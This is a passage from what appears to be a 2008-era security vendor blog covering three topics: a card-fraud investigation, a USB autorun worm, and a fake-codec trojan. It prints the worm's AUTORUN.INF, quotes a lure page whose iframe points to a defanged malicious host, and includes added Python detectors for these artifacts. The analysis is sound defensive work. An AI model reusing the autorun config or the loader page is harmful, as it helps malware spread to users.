    If this were a fake business, how could they have a legitimate merchant account with the ability to authorize charges?  PG had to establish itself with a payment gateway service, a service that facilitates payment between the customer and their credit card company.  In this case, I believe Authorize.net is the payment service.  If PG is based on criminal activity, illegally charging credit cards, how could they possibly pass themselves off as legitimate to Authorize.net, which has an interest in minimizing the fraud flowing through its systems?  Maybe my suspicion was unfounded: PG is a bona fide business after all, and someone else charged Daffodil's card to gain access to PG.  Hmm, nice thought, but that possibility was quickly put to rest.  Using the login credentials I had just paid for with my Gift Card, I logged into PG.  I didn't get too far.  All the links looped back to the homepage.  There was no actual content available after logging in.  PG was looking more and more like a fake.

    Finding 2: I dug through the page's source code and found the site was set up to block search engines from indexing it (using the robots.txt method), even blocking access to the homepage (see image below).

    It is not unheard of for web sites to do this, but for a site that is supposed to be a business that makes its money by attracting visitors, it is definitely suspicious that PG blocks what is essentially free advertising through search engines.

    Finding 3: Next I looked up who the site belongs to.  The current registrant is Domains By Proxy, run by the parent company GoDaddy.com.  Domains By Proxy offers private domain registration, a type of service used by the true registrants to conceal their identity.  Though such services are not illegal and are often used for legitimate purposes, they can slow down efforts to discover the true source of fraud, spam and other illegal activities.  On the Domains By Proxy homepage there are the following links: "if you are in law enforcement click here" and "for our subpoenas policies click here".  As of this writing, I have not been able to ascertain the true registrant of PG.  I am guessing they would rather I not find out.  I sent an email to Domains By Proxy just before this writing asking for the contact information of the true registrant.  I am curious what reply I will receive.

    Finding 4: When I first looked over the site, I was a bit surprised to see a legitimate-looking privacy policy.  From what I could tell, all the key privacy areas were addressed.  After searching the web, I found a legitimate picture site with the identical policy.  I am guessing PG swiped the policy verbatim.

    How Did The Criminals Get Daffodil's Credit Card Data?

    Though none of these findings alone concretely proves guilt, combined they scream fraud.  The charge to Daffodil's Visa was fraudulent, period.  Still, I had no idea how the fraudsters got their paws on Daffodil's credit card number (and the additional information required to process a payment, like home address and verification code).  On a daily basis I analyze malicious software aimed at rounding up personal data from computers and forwarding it to the attacker, so my obvious hunch was that Daffodil was infected with spyware.  Long story short, I did a full analysis of her system and found not even a trace of spyware.  Next I thought maybe she was a victim of phishing, a scheme where the victim is lured into entering personal information on a website that looks totally legitimate while the data is actually routed to a third-party attacker.  I checked a variety of locations on her system (including the Temporary Internet Files and History) and found no indication of phishing, though it would be impossible to make any definitive conclusion on this.  Daffodil has had the compromised credit card for over two years, so the number could have been intercepted at any time in between, and the evidence could be missing or wiped out by now.  There are too many variables here to conclude that her personal information was transmitted directly from her computer, though all indications are that it wasn't.

    A Much Larger Problem

    Next, I searched the web and found a lot of other folks with nearly identical claims of being erroneously charged $9.87 by PG.  Here are a few examples: 1, 2, 3, 4, 5, 6, 7, and the list continues to grow.  If spyware or phishing is not the culprit, how did PG obtain such a long list of credit cards to charge?  Unfortunately, for now, any answer to this question is only speculation.  Based on a loose survey of people fraudulently charged and posting to forums, here are some characteristics:

    • Users have never been to the fake website(s)
    • Some users have been charged multiple times
    • When victims contacted the fake websites (like PG) for a refund, PG granted it almost immediately
    • Fraudsters sent preformatted responses to victims' complaints
    • A lot of users wrongly assumed PG (and related sites) were legitimate businesses that were merely doing a bad thing, or were victims themselves
    • Charges have been made to credit cards that have never been used by the victim
    • Phone numbers associated with the fake sites play prerecorded messages
    • No common factor links all victims (such as shopping at the same site, the same card type, or a spyware infection)
    • Some of the fake websites have operated for as long as a year
    • No common credit card or card type was used

    These characteristics raise more questions than they answer.  Who is behind all of this?  How can they continue to operate so seamlessly without significant interruption from law enforcement or the banks?

    When Daffodil called Visa and reported the $9.87 charge as fraud, she was actually thwarting a powerful criminal organization.  In the next few days I will write a follow-up blog to paint a basic picture of how the criminal operation behind this fraud works.  Telling Visa the charge is fraud, as opposed to disputing the charge or requesting a refund, caused a chargeback to the fraudsters.  Chargebacks can cost the merchant (the fraudsters in this case) as much as $50, which would leave them with a net loss of $40.13 on this charge.  If enough card holders notice the charges and initiate a chargeback, the fraudsters lose.  The power lies in the consumer's hands.  In addition, when a merchant receives a certain number of chargebacks, flags are raised with the merchant account provider and the bank, leading to a shutdown of that part of the operation.  Most users are good about spotting erroneous charges if they are significant, but may overlook smaller ones.  A fraudulent charge of any size is an indication that you've got a real problem on your hands and it needs to be dealt with.  This fraud scheme relies on charging small amounts across a lot of people over a relatively long period of time.  That leaves plenty of room for consumers to push back.  Your credit card number is in the hands of a serious criminal organization and you need to take action.

    If you find a fraudulent charge, here are some things you should do:

    1) Cancel your credit card. Your card number is in the wrong hands and is likely to be used again for illegal purposes.
    2) File a complaint with the FBI's Internet Crime Complaint Center (IC3). For any complaint you file, give as complete information as possible, including the exact charge amount, company name, phone number and anything else available. The more variables you include, the greater the chance investigators can find common factors across victims and nail the criminals.
    3) Initiate a chargeback by filing a fraud claim with your card issuer; do not merely dispute the charges. The distinction here is critical. A chargeback sticks the fraudster with a hefty fee and helps raise the warning flags at banks and merchant account providers.
    4) Look back over old statements for any missed charges. In many cases, the fraudsters have made multiple charges to the same credit card.
    5) Even though there is no indication spyware was the culprit for the card loss in this case, complete a thorough scan with your anti-virus and anti-spyware products.
    6) DO NOT call the fraudsters and ask for a refund. It is counterintuitive, but in most cases they will grant you a refund immediately to keep banks and authorities out of the picture. Report it as fraud!

    Daffodil admittedly got lucky when she spotted the $9.87 charge by PICTUREGLOBUS.com, but she followed up with exactly the right response.  In the future, she tells me, "I will keep a close eye on even the smallest charges for possible fraud".  And so should you!

  • USB drives infected? A quick analysis

    by Rossano Ferraris

     

    Interestingly, the new year 2008 opened its doors with surprising news in the malware field.  Hardware infected?  Yes, once again the malware authors have shown their extraordinary imagination in spreading panic and disaster across the computer world.

    According to recent reports by the SANS Internet Storm Center, there is a new trend of transmitting malware through hardware vehicles such as USB devices.  As you know, the USB port is a very powerful channel for transferring data between our PC and an external device: memory sticks, SD cards for digital cameras, GPS devices and external hard drives, for example.  Every storage device plugged into your PC through a USB port is treated as a drive, and every device your PC treats as a drive can carry malware that compromises it.

    To explain better what happens from the technical point of view, I would like to show you some details of a malware sample I received from one of our customers, who stated that his computer had been compromised after he plugged in a USB flash card.

    The malicious architecture of the malware

     

    The malware (a virus) copies itself to every hard drive, internal and external, altering the AUTORUN.INF file, which in this incident looks like this:

    [AutoRun]
    ;liZc7kkoes7kd22k3D4Z0140fsoid2l47LiHKsLpXafw2Djr3larS5ed04sK503kUDd0Af7kDkK0FwkJ8ooJkLe1rwfrLl
    open=xo8wr9.exe
    ;4dirwkkswijrSKkASFkKd4o2a2KJ54LAo3a5oD92Sppcd34osCwrA0dqfiJZs9L1oLaKw1D33rwLO7f4k3dsjw28offsls0ww4Ka
    shell\open\Command=xo8wr9.exe
    ;r8k4ewsw35irr9S1iidak5oLaqw4k2D3Kf1jjdn1sUKioJlAKLioami
    shell\open\Default=1
    ;LAKiLkkw7j2jIrSsDfFqa3ADLnq2reskSLiloawii5Kl3qaDk5w9L1m2dsklwla24edOw5rlf3w3k4fJj8i
    shell\explore\Command=xo8wr9.exe
    ;aeDAp645K5kL71J5r7aZsc3Iksoj25ak3kaAokiw7wac2dwk1pKes5rJs2disajkLll

     

    The malware (xo8wr9.exe) is launched every time you open your drive:
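    As an added example (not code from the original post or from CA), the following Python triages an autorun.inf such as the one above. It parses the [AutoRun] section, reports which keys launch an executable and which context-menu verbs (Open, Explore) have been redirected, and notes the long random comment lines, which Windows ignores but which give every copy of the file a different hash. Both samples embedded in the block are constructed: the malicious one mirrors the keys quoted above, the benign one mimics what a driver CD or camera ships with.

```python
import re

# Constructed sample modelled on the AUTORUN.INF quoted in the post: same keys
# and executable name, junk comment lines shortened and made up.
MALICIOUS_AUTORUN = r"""[AutoRun]
;liZc7kkoes7kd22k3D4Z0140fsoid2l47LiHKsLpXafw2Djr3larS5ed04sK503kUDd0Af7kDkK0FwkJ8ooJkLe1rwfrLl
open=xo8wr9.exe
;4dirwkkswijrSKkASFkKd4o2a2KJ54LAo3a5oD92Sppcd34osCwrA0dqfiJZs9L1oLaKw1D33rwLO7f4k3dsjw28offsls0ww4Ka
shell\open\Command=xo8wr9.exe
shell\open\Default=1
shell\explore\Command=xo8wr9.exe
"""

# Constructed benign autorun.inf: icon and label are cosmetic and never run code.
BENIGN_AUTORUN = r"""[autorun]
icon=setup.exe,0
label=Camera Software
"""

# Keys that make Windows run something when the drive is opened or double-clicked
EXEC_KEYS = {"open", "shellexecute"}
# shell\<verb>\command replaces what a context-menu verb such as Open or Explore does
SHELL_CMD_RE = re.compile(r"^shell\\([^\\]+)\\command$")


def parse_autorun(text):
    """Return (entries, comments): entries are (key, value) pairs from the
    [autorun] section with keys lower-cased, comments are ';' lines without the ';'."""
    entries, comments, in_section = [], [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(";"):
            comments.append(line[1:])
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            entries.append((key.strip().lower(), value.strip()))
    return entries, comments


def launched_executables(text):
    """Set of files (lower-cased) that this autorun.inf would launch."""
    entries, _ = parse_autorun(text)
    return {v.lower() for k, v in entries if k in EXEC_KEYS or SHELL_CMD_RE.match(k)}


def assess_autorun(text):
    """Return human-readable findings; an empty list means nothing suspicious."""
    entries, comments = parse_autorun(text)
    findings = []
    by_exe = {}
    for key, value in entries:
        if key in EXEC_KEYS or SHELL_CMD_RE.match(key):
            by_exe.setdefault(value.lower(), []).append(key)
    for exe, keys in by_exe.items():
        findings.append(f"{exe} launched via {', '.join(keys)}")
    verbs = [m.group(1) for k, _ in entries for m in [SHELL_CMD_RE.match(k)] if m]
    if verbs:
        findings.append("context-menu verbs hijacked: " + ", ".join(verbs))
    # Long comment lines with no spaces: Windows ignores them, but each variant
    # gets a different file hash, which defeats hash-based blocking.
    if any(len(c) > 40 and " " not in c for c in comments):
        findings.append("long random comment lines (ignored by Windows, vary the file hash)")
    return findings


if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_AUTORUN), ("benign", BENIGN_AUTORUN)):
        print(name, assess_autorun(sample) or ["no findings"])
```

    Run against a real drive root, the same functions apply to the autorun.inf Windows would honour; the point of the verb check is that both the Open and Explore actions end up running the same unknown executable, so merely browsing the drive from Explorer is enough to infect the machine.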

     

     

     

    It not only copies itself to other drives: according to this incident analysis, it also drops other malware onto your PC and opens a hidden connection to a malicious remote server in China.

    CA users and customers are protected from this malware through detection by our CA anti-malware solutions (CA Anti-Virus and CA Anti-Spyware), but to help prevent future incidents I would like to offer some recommendations:

    • Regularly update your anti-malware solutions to the latest signatures
    • If possible, disable the Windows AutoPlay feature:
      • Start menu > Run and type “gpedit.msc”
      • Select Administrative Templates > System
      • In the right-hand pane you see an item called “Turn off Autoplay”
      • Double-click the item and set the radio button to Enabled
      • Change "Turn off Autoplay on" to All Drives
    • Scan your external USB device with AutoPlay disabled before browsing it

     

     

  • Internet searches under attack: next in series

     

    by Rossano Ferraris

     

    Another interesting case I would like to bring to your attention is the effect of the so-called “fake-codec” trojans.  Here is what I found after searching for the phrase “daily dawn” on the Google search engine.  The screenshot reflects a blogspot webpage from the search results:

    There is a video displayed on the page.  Out of curiosity, I click on the arrow button to watch it.  After doing so, another window comes up stating that I need to install a new version of the Video ActiveX Object software for the video to play correctly.

    Then, after clicking the Continue button, a popup window comes up asking whether I want to save or run an executable file.

    Before going on with this analysis, I would like to encourage you to sharpen your observation skills.  Take a look at the address bar of the first window, which came up asking to install a new version of ActiveX, shown again below.

    The web site hxxp://siski<DOT>cn is a very interesting link which is still active and whose IP address changes day by day.  The content of this weblink is very small:

    <html>
    <head>
    <title>play video</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    </head>
    <body> <div align="center">
    <iframe src="hxxp://mymetavids<DOT>com/l/error/id/3913230/" height="400" width="502" marginwidth="0" marginheight="0" scrolling="no" frameborder="0"></iframe>
    </div>
    </body>
    </html>

    This site contains an iframe (see http://en.wikipedia.org/wiki/IFrame for an explanation of iframes) which redirects the browser to another website allegedly containing the Video ActiveX Object software.  In actuality, the iframe redirects to a trojan file.
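    As an added example (not code from the original post or from CA), the Python below performs the kind of static check an analyst would run on a page like the one quoted above: it collects every iframe with Python's html.parser, reports frames whose src host differs from the page's own host, frames that are hidden (zero-size or display:none), and frames styled to blend into the page, and it recognises a "bare loader", a page whose only real content is the iframe. The embedded page is constructed to mirror the quoted loader; its hostnames are placeholders, not the ones from the post.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page modelled on the "play video" loader quoted in the post;
# the hostnames are placeholders.
LOADER_PAGE = """<html><head><title>play video</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<body><div align="center">
<iframe src="http://video-host.example/l/error/id/3913230/" height="400" width="502"
 marginwidth="0" marginheight="0" scrolling="no" frameborder="0"></iframe>
</div></body></html>"""


class PageCollector(HTMLParser):
    """Collects iframe attributes and the visible text of a page."""
    SKIP = {"title", "script", "style"}  # text in these tags is not visible content

    def __init__(self):
        super().__init__()
        self.iframes, self.text, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        if tag in self.SKIP:
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


def _px(value):
    """Parse a width/height attribute; None if absent or not numeric."""
    try:
        return int(value.lower().rstrip("px").strip())
    except (AttributeError, ValueError):
        return None


def assess_iframes(html, page_url):
    """One dict per iframe: its src and the reasons it deserves a closer look."""
    c = PageCollector()
    c.feed(html)
    page_host = (urlparse(page_url).hostname or "").lower()
    results = []
    for attrs in c.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        notes = []
        if host and host != page_host:
            notes.append(f"loads third-party content from {host}")
        w, h = _px(attrs.get("width")), _px(attrs.get("height"))
        style = attrs.get("style", "").replace(" ", "").lower()
        if (w is not None and w <= 1) or (h is not None and h <= 1) or "display:none" in style:
            notes.append("hidden frame (zero-size or display:none)")
        if attrs.get("frameborder") == "0" and attrs.get("scrolling", "").lower() == "no":
            notes.append("borderless, non-scrolling: blends into the page")
        results.append({"src": src, "notes": notes})
    return results


def is_bare_loader(html, max_visible_chars=20):
    """True when the page is little more than a wrapper around an iframe."""
    c = PageCollector()
    c.feed(html)
    visible = "".join(c.text).strip()
    return bool(c.iframes) and len(visible) <= max_visible_chars


if __name__ == "__main__":
    for frame in assess_iframes(LOADER_PAGE, "http://lure.example/play"):
        print(frame["src"], "->", "; ".join(frame["notes"]))
    print("bare loader:", is_bare_loader(LOADER_PAGE))
```

    The host comparison is deliberately simple (exact hostname match); a production scanner would compare registrable domains and allow-list known embed providers, but the shape of the check is the same.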

     

    Let’s see what happens when the video-codec trojan executes.  The installation starts with an EULA, which makes it appear to the user to be something serious and legitimate:

    Once installed the end-user is requested to restart the browser:

     

     

     

    When I restart the browser, my network sniffing tool begins to track a lot of traffic between my local machine and the domain creatonproject.com:

    oggview32.dll is an interesting malicious file installed in my C:\Windows folder and operating as a Browser Helper Object.  The file is caught during the transmission process, as shown in the screenshot:

    The funny thing about this malicious DLL is that it pretends to be a file belonging to Kodak, so that the user keeps it on the system.  In truth, the file description reveals it belongs to a certain nonexistent "Kodack" company and not the well-known Kodak!!

    The bottom line is that the fake codec file we installed is definitely malicious, dropping a BHO (Browser Helper Object) which in turn communicates with a third-party server without our permission and alters the settings of the browser.
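    As an added example (not code from the original post or from CA), here is Python showing two checks an analyst would make in a case like this. The first parses a .reg export of the Browser Helper Objects key and of HKEY_CLASSES_ROOT\CLSID, resolves each registered BHO to the DLL that COM will load for it, and flags any DLL living outside System32 or Program Files, as oggview32.dll in C:\Windows does. The second flags a CompanyName from a file's version information that is one or two characters away from a real vendor, the "Kodack" versus "Kodak" trick. The registry export and the vendor list are constructed for the example; the CLSIDs are placeholders.

```python
BHO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"
CLSID_KEY = r"HKEY_CLASSES_ROOT\CLSID"

# Constructed .reg export: one BHO pointing at a DLL in C:\Windows (as in the
# post) and one pointing at a vendor folder under Program Files. Placeholder CLSIDs.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-2222-3333-4444-555555555555}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}]

[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Windows\\oggview32.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}\InprocServer32]
@="C:\\Program Files\\Example Vendor\\helper.dll"
"ThreadingModel"="Apartment"
"""

# Directories where a legitimately installed in-process COM server normally lives
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\")


def parse_reg(text):
    """Return {key_path: {value_name: data}} for the string values in a .reg export.
    '@' is the key's default value; .reg files escape backslashes and quotes."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line:
            name, _, data = line.partition("=")
            name = "(Default)" if name == "@" else name.strip('"')
            if data.startswith('"') and data.endswith('"'):
                data = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
            keys[current][name] = data
    return keys


def installed_bhos(reg):
    """Map each registered BHO CLSID to the DLL path COM will load for it (None if unresolved)."""
    result = {}
    for key in reg:
        if key.lower().startswith(BHO_KEY.lower() + "\\"):
            clsid = key.rsplit("\\", 1)[1]
            server = reg.get(f"{CLSID_KEY}\\{clsid}\\InprocServer32", {})
            result[clsid] = server.get("(Default)")
    return result


def suspicious_bhos(reg):
    """(clsid, path, reason) for BHOs whose DLL is missing or outside trusted directories."""
    out = []
    for clsid, path in installed_bhos(reg).items():
        if path is None:
            out.append((clsid, None, "no InprocServer32 path registered"))
            continue
        # Normalise the two common environment variables before comparing
        low = path.lower().replace("%systemroot%", "c:\\windows").replace("%programfiles%", "c:\\program files")
        if not low.startswith(TRUSTED_DIRS):
            out.append((clsid, path, "DLL outside System32 / Program Files"))
    return out


def edit_distance(a, b):
    """Levenshtein distance between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


KNOWN_VENDORS = ["Kodak", "Microsoft", "Adobe", "Google"]  # illustrative list


def lookalike_vendor(company_name, known=KNOWN_VENDORS, max_distance=2):
    """Return the genuine vendor a CompanyName imitates; None if it matches exactly or is unrelated."""
    name = company_name.strip().lower()
    for vendor in known:
        if 0 < edit_distance(name, vendor.lower()) <= max_distance:
            return vendor
    return None


if __name__ == "__main__":
    for clsid, path, reason in suspicious_bhos(parse_reg(SAMPLE_REG)):
        print(clsid, path, reason)
    print("Kodack imitates:", lookalike_vendor("Kodack"))
```

    On a live system the same export is produced with reg.exe, and the CompanyName comes from the DLL's version resource; the two checks together catch exactly the combination seen here, a BHO loaded from an unusual directory under a vendor name that is almost, but not quite, a real one.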

     

    CA Anti-Virus and CA Anti-Spyware products detect and remove the pests discussed above as Burgspill trojans.
    The sad situation is that cybercriminals know no limits to their malicious actions.

    For example, they exploited the tragic news of the assassination of Benazir Bhutto to inject malicious